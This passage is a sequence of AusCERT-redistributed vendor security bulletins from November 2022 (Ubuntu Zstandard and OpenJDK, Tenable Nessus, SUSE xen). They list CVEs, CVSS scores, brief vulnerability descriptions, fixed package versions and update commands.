https://access.redhat.com/security/cve/CVE-2022-37434
https://access.redhat.com/security/cve/CVE-2022-39399
https://access.redhat.com/security/cve/CVE-2022-40674
https://access.redhat.com/security/updates/classification/#moderate
6. Contact:
The Red Hat security contact is . More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBY2v3pdzjgjWX9erEAQieXA//RS5LPNCMBmQuk2BFdWb8ac7zWMDMh6ia
qMmQdkJurPEKzihaFAHCTv8cAjQhydghH48dATJobRXe545sGP2BpLOUrlQj52/u
tY80fOTre7ocZqtQPznax7CFeigk3f959PjWzjPztSznxblj/2i52DrPFNg9uvj+
5BI/kp+tztKTXLFmjUXC+SilR5Q1KLNsEhscIJ6frqz3wIB4acVj2YMNHbFLC3Zu
aTH64AFFvfac1IhBFtD51KgS+0p6ReAetCt3KssdEFgv+ajLwvnitzfrBOCnp4y7
rvc/AdhKeQDWYvvFPsjYdD8qRHplMMBSDolshDLq4/Qhxwha80wTJ4282NTpZilY
8zdweut+1H+Wg8o6RYKmoWPbuncdhk3JVoqNFmmYsOdFRyH2Dezeqpe1P3eiT4vY
iM8zOfJM8XyCSis3rm1A9hUed2yBl7A1mNMVRke24xmayBfe5cVUHdguKhUQTDyh
4lVvkFY91S6izDLyiVTU5QoPmMHSef6w+uRkumOHDuGCxFctlmBMFHzBiUTYdkmk
moPMpZWf4YKzFSMLZuC562uQ2Y7lP/GBkPuVxa0aa04PMXdMb0fLuYyaUzsks8kW
r37lN9gtMLVrLaX5tTa4UyHjWy2P2kkH+8ZeHs7RqrDHawISEGoo0NsD8D4LG7FC
2eYvDFN/BO4=
=lzPS
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yHqckNZI30y1K9AQjGXA//VoZKKL8KAmDyRDghPJHQEMwcd1g6R639
Y6A7v+DCORVdaG/3EFFobwLUyTF+rAae5sGFkWOML3QDW29siQhSSgYIrOJFVgnT
QY52S1Mqrm7of/veQ2X6yxtyqrQAmm/Ky4uLc7gpkdtol4v48dQ/70S/g4kSuoy2
xLB1CWrfoO2KM3aybWVxlr+KmHaIz8csoa8gTzmFQ/S0OykiiX3Hwady3eY4hCPv
0Qinh0xoUY9XRD4yWyGdmlQQrIeVaEpv2umZQXM91GpPHlSGLhSq9es9r3LQjqkn
HIcZUcMxtXOo/8GbKCp1WT5Sxq0P5emXHJ8lGmNbkp7t8j+CyGvVeRpD6rfvkDLi
ZdEeTqYNVP3MPJJKARYfKyHVF5YIN9t2iuZhcqFD9Xt7CxUc0/bnUlHe2JqrQ/bl
Lw8CbNB3iT/VWNCjX1vS6vHzeAywIoRCbcLm0oaZxB31QzSKHFOilOMXK7ZZe+yo
ShSksgwMpZoMxYrMxIeuOCG4JxPOVGrBaBepStS6PGSqd5LycoRb3ciJjMogqJzG
0j/qWAu36LZyNMDFFPSoznh/s05lWY6PyvpqW98VZA7eOS2+zuhpM4NAQ+amf6xq
syc06faDlpL4pMiHIhY2Mt6o2K+YeSfwaw7ZgFiAC3YBhpN0pCwPRfOdoexpGtwm
KeNj8i4+f3k=
=G+OQ
-----END PGP SIGNATURE-----
ESB-2022.5784 - [Ubuntu] Zstandard: CVSS (Max): 5.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5784
USN-5720-1: Zstandard vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Zstandard
Publisher: Ubuntu
Operating System: Ubuntu
Resolution: Patch/Upgrade
CVE Names: CVE-2021-24032 CVE-2021-24031
Original Bulletin:
https://ubuntu.com/security/notices/USN-5720-1
Comment: CVSS (Max): 5.5 CVE-2021-24031 (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- --------------------------BEGIN INCLUDED TEXT--------------------
USN-5720-1: Zstandard vulnerabilities
9 November 2022
Zstandard could be made to expose sensitive information
Releases
o Ubuntu 16.04 ESM
Packages
o libzstd - fast lossless compression algorithm
Details
It was discovered that Zstandard was not properly managing file
permissions when generating output files. A local attacker could
possibly use this issue to cause a race condition and gain
unauthorized access to sensitive data.
Update instructions
The problem can be corrected by updating your system to the following package
versions:
Ubuntu 16.04
o zstd - 1.3.1+dfsg-1~ubuntu0.16.04.1+esm3
Available with Ubuntu Pro (Infra-only)
o libzstd1 - 1.3.1+dfsg-1~ubuntu0.16.04.1+esm3
Available with Ubuntu Pro (Infra-only)
In general, a standard system update will make all the necessary changes.
References
o CVE-2021-24031
o CVE-2021-24032
Related notices
o USN-4760-1 : libzstd-dev, libzstd, zstd, libzstd1-dev, libzstd1-udeb,
libzstd1
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yHfskNZI30y1K9AQiIuw//bEP64/GdXGmmU5frMEPhRxKsf2swCv3e
LFHsgWTQSTnoRJTteLq6w0+bPhtt5Mvan6cexwAZjFfni31YxL54QWrxiZmH8JSL
j6+iMPfOwHUCOwV+CwESVfOODIU8aAqmH4YTHQORC6BhUBP5YA4FMl8lQYh3PeiP
887GK6RynJmGWQhIxRYdUOMGqt2cURsLqJVu6SOxgs40ww1FPwK/BsxiyPYBFhpY
3vWH1B5PZ9gIYXT95DYk1Dedj4PBLm1kEBWsJ0m22IhsaCZ6me7cWs1YLtnmEs9o
7Dh6+8t/eo/3T7lKwxxen27Dnepmq3N1uc1wUKjswDUcxvscXb75Ukn1v5Hs2rnN
nIAfCskBwAPnh66OG88Rez/Yrz7DfSoc11F0TJEq2eJOfHADttWV9dI8Oif6ZjwB
lD6ZDl3pJC+AWXIUL42hsZ71iGIh4c1krzR+1zmVxrnuMAPU1o39p/ACITYODDOz
8y3iUHLuxePRIjf8jMt2yqrliLWvYa5AhToMNMgmCD+XQzoRRMFNnPu3wM4q8ZaW
wTAgg/sOA8IIrHQm6Pfbtufjl0LX+iJ2goDfe7Zv/NZhe9FU1hq2Kb9doHjsRBQt
C0rRXFBTVvz/ZWed5+eYDrTegGQXSd24JxTYIXAwMPfgaabUYoUXFeyZJ2bjHWQb
UnbS7rPTFYM=
=dXOf
-----END PGP SIGNATURE-----
ESB-2022.5783 - [Ubuntu] OpenJDK: CVSS (Max): 5.3
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5783
USN-5719-1: OpenJDK vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: OpenJDK
Publisher: Ubuntu
Operating System: Ubuntu
Resolution: Patch/Upgrade
CVE Names: CVE-2022-39399 CVE-2022-21628 CVE-2022-21626
CVE-2022-21624 CVE-2022-21619 CVE-2022-21618
Original Bulletin:
https://ubuntu.com/security/notices/USN-5719-1
Comment: CVSS (Max): 5.3 CVE-2022-21628 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
- --------------------------BEGIN INCLUDED TEXT--------------------
USN-5719-1: OpenJDK vulnerabilities
9 November 2022
Several security issues were fixed in OpenJDK.
Releases
o Ubuntu 22.10
o Ubuntu 22.04 LTS
o Ubuntu 20.04 LTS
o Ubuntu 18.04 LTS
o Ubuntu 16.04 ESM
Packages
o openjdk-17 - Open Source Java implementation
o openjdk-19 - Open Source Java implementation
o openjdk-8 - Open Source Java implementation
o openjdk-lts - Open Source Java implementation
Details
It was discovered that OpenJDK incorrectly handled long client hostnames.
An attacker could possibly use this issue to cause the corruption of
sensitive information. ( CVE-2022-21619 )
It was discovered that OpenJDK incorrectly randomized DNS port numbers. A
remote attacker could possibly use this issue to perform spoofing attacks.
( CVE-2022-21624 )
It was discovered that OpenJDK did not limit the number of connections
accepted from HTTP clients. An attacker could possibly use this issue to
cause a denial of service. ( CVE-2022-21628 )
It was discovered that OpenJDK incorrectly handled X.509 certificates. An
attacker could possibly use this issue to cause a denial of service. This
issue only affected OpenJDK 8 and OpenJDK 11. ( CVE-2022-21626 )
It was discovered that OpenJDK incorrectly handled cached server
connections. An attacker could possibly use this issue to perform spoofing
attacks. This issue only affected OpenJDK 11, OpenJDK 17 and OpenJDK 19.
( CVE-2022-39399 )
It was discovered that OpenJDK incorrectly handled byte conversions. An
attacker could possibly use this issue to obtain sensitive information.
This issue only affected OpenJDK 11, OpenJDK 17 and OpenJDK 19.
( CVE-2022-21618 )
Update instructions
The problem can be corrected by updating your system to the following package
versions:
Ubuntu 22.10
o openjdk-8-jre-headless - 8u352-ga-1~22.10
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2
o openjdk-11-jdk - 11.0.17+8-1ubuntu2
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1
o openjdk-17-jre - 17.0.5+8-2ubuntu1
o openjdk-17-jdk - 17.0.5+8-2ubuntu1
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1
o openjdk-8-jre-zero - 8u352-ga-1~22.10
o openjdk-19-jre - 19.0.1+10-1
o openjdk-8-jdk - 8u352-ga-1~22.10
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2
o openjdk-19-jre-zero - 19.0.1+10-1
o openjdk-8-jre - 8u352-ga-1~22.10
o openjdk-19-jre-headless - 19.0.1+10-1
o openjdk-19-jdk - 19.0.1+10-1
o openjdk-11-jre - 11.0.17+8-1ubuntu2
Ubuntu 22.04
o openjdk-8-jre-headless - 8u352-ga-1~22.04
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2~22.04
o openjdk-11-jdk - 11.0.17+8-1ubuntu2~22.04
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1~22.04
o openjdk-17-jre - 17.0.5+8-2ubuntu1~22.04
o openjdk-17-jdk - 17.0.5+8-2ubuntu1~22.04
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1~22.04
o openjdk-8-jre-zero - 8u352-ga-1~22.04
o openjdk-19-jre - 19.0.1+10-1ubuntu1~22.04
o openjdk-8-jdk - 8u352-ga-1~22.04
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2~22.04
o openjdk-19-jre-zero - 19.0.1+10-1ubuntu1~22.04
o openjdk-8-jre - 8u352-ga-1~22.04
o openjdk-19-jre-headless - 19.0.1+10-1ubuntu1~22.04
o openjdk-19-jdk - 19.0.1+10-1ubuntu1~22.04
o openjdk-11-jre - 11.0.17+8-1ubuntu2~22.04
Ubuntu 20.04
o openjdk-8-jre-headless - 8u352-ga-1~20.04
o openjdk-8-jre - 8u352-ga-1~20.04
o openjdk-11-jdk - 11.0.17+8-1ubuntu2~20.04
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1~20.04
o openjdk-17-jre - 17.0.5+8-2ubuntu1~20.04
o openjdk-17-jdk - 17.0.5+8-2ubuntu1~20.04
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1~20.04
o openjdk-8-jre-zero - 8u352-ga-1~20.04
o openjdk-8-jdk - 8u352-ga-1~20.04
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2~20.04
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2~20.04
o openjdk-11-jre - 11.0.17+8-1ubuntu2~20.04
Ubuntu 18.04
o openjdk-8-jre-headless - 8u352-ga-1~18.04
o openjdk-8-jre - 8u352-ga-1~18.04
o openjdk-11-jdk - 11.0.17+8-1ubuntu2~18.04
o openjdk-17-jre-headless - 17.0.5+8-2ubuntu1~18.04
o openjdk-17-jre - 17.0.5+8-2ubuntu1~18.04
o openjdk-17-jdk - 17.0.5+8-2ubuntu1~18.04
o openjdk-17-jre-zero - 17.0.5+8-2ubuntu1~18.04
o openjdk-8-jre-zero - 8u352-ga-1~18.04
o openjdk-8-jdk - 8u352-ga-1~18.04
o openjdk-11-jre-zero - 11.0.17+8-1ubuntu2~18.04
o openjdk-11-jre-headless - 11.0.17+8-1ubuntu2~18.04
o openjdk-11-jre - 11.0.17+8-1ubuntu2~18.04
Ubuntu 16.04
o openjdk-8-jdk - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
o openjdk-8-jre-headless - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
o openjdk-8-jre - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
o openjdk-8-jre-zero - 8u352-ga-1~16.04
Available with Ubuntu Pro (Infra-only)
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any Java
applications or applets to make all the necessary changes.
References
o CVE-2022-21618
o CVE-2022-21626
o CVE-2022-39399
o CVE-2022-21628
o CVE-2022-21619
o CVE-2022-21624
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yHYckNZI30y1K9AQh3qQ/+IgvrC+BKt+yGwDVYFVcGapAm8mrHVapR
UBZvhEf++1c2Yja/J7LZQ3qPuzJSgSsYP0p6dnj+wUOfBt9XCttPnfVq5PFQU0We
q1cnuSF9VZxx0h0iFJi0a6HdDE9h6OT8qA3RRCFSe4pCe5QqAHi/Idh5E8MSC6st
n+u1enRZBgkUkNXOwYXESU4aMekLw41aR/QZ2Ud5ea0KSwQzin2jie/mhs7PHZ9/
RYo1pHjNrXQrYI3DmAIYB/8m3JGFXq9sZyt/kq7uX8snIIw0MdfkFoKqqn7KbmUf
DJ3UJ5WmDz7O1Jw9KtXetFQRKT8WU7a0onhU9/YP5Ve6JXFnFd+ynPM+zGUK97PW
xhrsUYF5B55moAdvMkx/DK9DEEJkuk1IGWeYMgLwxQhJhmITbKGFtm3xSj7xkYyD
9P2s68OriRhyfpVuShze6R5/Jk5SkghPwpG7yngGlwfa706Qt4cKW+gbGiLkTTBV
y+0iTDlxITJFzO2stPOuVGASQkY/VpyXueyb+GtNn4Yo2MIvQTXrf1K4R1PdR81L
GhwMH5yNAmJmvKoQA1aOuBkohIjnE9GFAYYltg4nuuEApFzS+qs9J4C7zjHzcrrw
N4dQT+7l+x+1G/qsJxZHN4G5/P1C3u+gq4CfGam84FnmnBBq+zauYyjiIr0GWLsp
aLZEqyCn590=
=8gkY
-----END PGP SIGNATURE-----
ESB-2022.5782 - Nessus: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5782
[R1] Nessus Version 8.15.7 Fixes Multiple Vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Nessus
Publisher: Tenable
Operating System: Windows
UNIX variants (UNIX, Linux, OSX)
Resolution: Patch/Upgrade
CVE Names: CVE-2022-43680 CVE-2022-40674 CVE-2022-37434
CVE-2022-29824 CVE-2022-23308 CVE-2022-2309
Original Bulletin:
https://www.tenable.com/security/tns-2022-26
Comment: CVSS (Max): 9.8 CVE-2022-40674 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: Tenable
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
[R1] Nessus Version 8.15.7 Fixes Multiple Vulnerabilities
Critical
Synopsis
Nessus leverages third-party software to help provide underlying functionality.
Several of the third-party components (expat, libxml2, zlib) were found to
contain vulnerabilities, and updated versions have been made available by the
providers.
Out of caution and in line with good practice, Tenable has opted to upgrade
these components to address the potential impact of the issues. Nessus 8.15.7
updates expat to version 2.5.0, libxml2 to 2.10.3 and zlib to 1.2.13 to address
the identified vulnerabilities.
Solution
Tenable has released Nessus 8.15.7 to address these issues. The installation
files can be obtained from the Tenable Downloads Portal (https://
www.tenable.com/downloads/nessus).
This page contains information regarding security vulnerabilities that may
impact Tenable's products. This may include issues specific to our software, or
due to the use of third-party libraries within our software. Tenable strongly
encourages users to ensure that they upgrade or apply relevant patches in a
timely manner.
Tenable takes product security very seriously. If you believe you have found a
vulnerability in one of our products, we ask that you please work with us to
quickly resolve it in order to protect customers. Tenable believes in
responding quickly to such reports, maintaining communication with researchers,
and providing a solution in short order.
For more details on submitting vulnerability information, please see our
Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email
Risk Information
CVE ID: CVE-2022-2309
CVE-2022-29824
CVE-2022-23308
CVE-2022-40674
CVE-2022-43680
CVE-2022-37434
Tenable Advisory ID
TNS-2022-26
Risk Factor
Critical
CVSSv3 Base / Temporal Score
7.5 / 6.7 (CVE-2022-2309)
6.5 / 5.7 (CVE-2022-29824)
7.5 / 6.5 (CVE-2022-23308)
9.8 / 8.5 (CVE-2022-40674)
7.5 / 6.5 (CVE-2022-43680)
9.8 / 8.5 (CVE-2022-37434)
CVSSv3 Vector
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C (CVE-2022-2309)
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2022-29824)
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2022-23308)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C (CVE-2022-40674)
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C (CVE-2022-43680)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C (CVE-2022-37434)
Affected Products
Nessus 8.15.1 to Nessus 8.15.6
Advisory Timeline
2022-11-09 - [R1] Initial Release
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yHSMkNZI30y1K9AQj6aw/7B82swnk+Ihon0K19FYx76eB5XmKRkJrM
vlv62Weg0MDNaZWvBDOBTdwjTzWiznZinecb9+hruN8eVigEmRk7lEAY+hCRk9//
WRW9MS+7LQicFvA0pNy13SdFM/xkdUmldOq6quB6A2JsUomFZUzEYfi9q31wQ18D
GlGyIDaQOQ6Q5N31h+0sGOrqkL4ua9vL95bfNFvbzbtN6WB3IjuOA4RRxmJx0/p6
V4ixbHxezQx1KrEAMEb7/43sqgcg4WyVttv4Nt2iUK6msSgrTAA+Ko3ad65nCKqQ
rrbpRfBTxf1usP/pJ/XPyZ3K5w0XMP52XU0zY6kmc53/S8B2Tu6a8/3FiWvG2rPZ
WWD35RRrdtlepDwlkvpcrFnZihsm6jkMPIYitHAZhfUyMju+0EucyHRH3aoTF2tI
y1hzUwQWAM9wIFyiFbfIbznBr7k8Ll69Hjm+Nj1Q6maMPkybesOHv3ekuQ33YceV
H0bh4BjmAPXUDgIo6siv5LMFgcfaztDRUnJl1tPKjQ4/ONlx9W5qOH2IA6Gkvfj0
ZgsQx5g27bt+cQKiQyyZekEKUCW+01T38oj1ig4IKAXol0hgFsu0IWUlEWcFaOnw
7N2G18x8z/F4JGLuILkXXyHdCovpwDafQxRwnUDUhQbok0KlfsAsbPySegnNWoAP
Baq/P20u1bY=
=ir9h
-----END PGP SIGNATURE-----
ESB-2022.5781 - [SUSE] xen: CVSS (Max): 7.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5781
Security update for xen
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: xen
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
CVE Names: CVE-2022-42326 CVE-2022-42325 CVE-2022-42323
CVE-2022-42322 CVE-2022-42321 CVE-2022-42320
CVE-2022-42319 CVE-2022-42318 CVE-2022-42317
CVE-2022-42316 CVE-2022-42315 CVE-2022-42314
CVE-2022-42313 CVE-2022-42312 CVE-2022-42311
CVE-2022-42310 CVE-2022-42309 CVE-2022-33748
CVE-2022-33746 CVE-2021-28689
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223925-1
Comment: CVSS (Max): 7.5 CVE-2022-42320 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)
CVSS Source: SUSE
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for xen
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3925-1
Rating: important
References: #1185104 #1193923 #1203806 #1203807 #1204482 #1204485
#1204487 #1204488 #1204489 #1204490 #1204494 #1204496
Cross-References: CVE-2021-28689 CVE-2022-33746 CVE-2022-33748 CVE-2022-42309
CVE-2022-42310 CVE-2022-42311 CVE-2022-42312 CVE-2022-42313
CVE-2022-42314 CVE-2022-42315 CVE-2022-42316 CVE-2022-42317
CVE-2022-42318 CVE-2022-42319 CVE-2022-42320 CVE-2022-42321
CVE-2022-42322 CVE-2022-42323 CVE-2022-42325 CVE-2022-42326
Affected Products:
SUSE Linux Enterprise High Performance Computing 15-ESPOS
SUSE Linux Enterprise High Performance Computing 15-LTSS
SUSE Linux Enterprise Server for SAP 15
______________________________________________________________________________
An update that fixes 20 vulnerabilities is now available.
Description:
This update for xen fixes the following issues:
o CVE-2022-33746: Fixed DoS due to excessively long P2M pool freeing (bsc#
1203806).
o CVE-2022-33748: Fixed DoS due to race in locking (bsc#1203807).
o CVE-2021-28689: Fixed speculative vulnerabilities with bare (non-shim)
32-bit PV guests (bsc#1185104).
o CVE-2022-42311, CVE-2022-42312, CVE-2022-42313, CVE-2022-42314,
CVE-2022-42315, CVE-2022-42316, CVE-2022-42317, CVE-2022-42318: xen:
Xenstore: Guests can let xenstored run out of memory (bsc#1204482)
o CVE-2022-42309: xen: Xenstore: Guests can crash xenstored (bsc#1204485)
o CVE-2022-42310: xen: Xenstore: Guests can create orphaned Xenstore nodes
(bsc#1204487)
o CVE-2022-42319: xen: Xenstore: Guests can cause Xenstore to not free
temporary memory (bsc#1204488)
o CVE-2022-42320: xen: Xenstore: Guests can get access to Xenstore nodes of
deleted domains (bsc#1204489)
o CVE-2022-42321: xen: Xenstore: Guests can crash xenstored via exhausting
the stack (bsc#1204490)
o CVE-2022-42322,CVE-2022-42323: xen: Xenstore: cooperating guests can create
arbitrary numbers of nodes (bsc#1204494)
o CVE-2022-42325,CVE-2022-42326: xen: Xenstore: Guests can create arbitrary
number of nodes via transactions (bsc#1204496)
o xen: Frontends vulnerable to backends (bsc#1193923)
Special Instructions and Notes:
Please reboot the system after installing this update.
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o SUSE Linux Enterprise Server for SAP 15:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2022-3925=1
o SUSE Linux Enterprise High Performance Computing 15-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3925=1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-2022-3925=1
Package List:
o SUSE Linux Enterprise Server for SAP 15 (x86_64):
xen-4.10.4_40-150000.3.84.1
xen-debugsource-4.10.4_40-150000.3.84.1
xen-devel-4.10.4_40-150000.3.84.1
xen-libs-4.10.4_40-150000.3.84.1
xen-libs-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-4.10.4_40-150000.3.84.1
xen-tools-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-domU-4.10.4_40-150000.3.84.1
xen-tools-domU-debuginfo-4.10.4_40-150000.3.84.1
o SUSE Linux Enterprise High Performance Computing 15-LTSS (x86_64):
xen-4.10.4_40-150000.3.84.1
xen-debugsource-4.10.4_40-150000.3.84.1
xen-devel-4.10.4_40-150000.3.84.1
xen-libs-4.10.4_40-150000.3.84.1
xen-libs-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-4.10.4_40-150000.3.84.1
xen-tools-debuginfo-4.10.4_40-150000.3.84.1
xen-tools-domU-4.10.4_40-150000.3.84.1
xen-tools-domU-debuginfo-4.10.4_40-150000.3.84.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (x86_64):
xen-4.10.4_40-150000.3.84.1
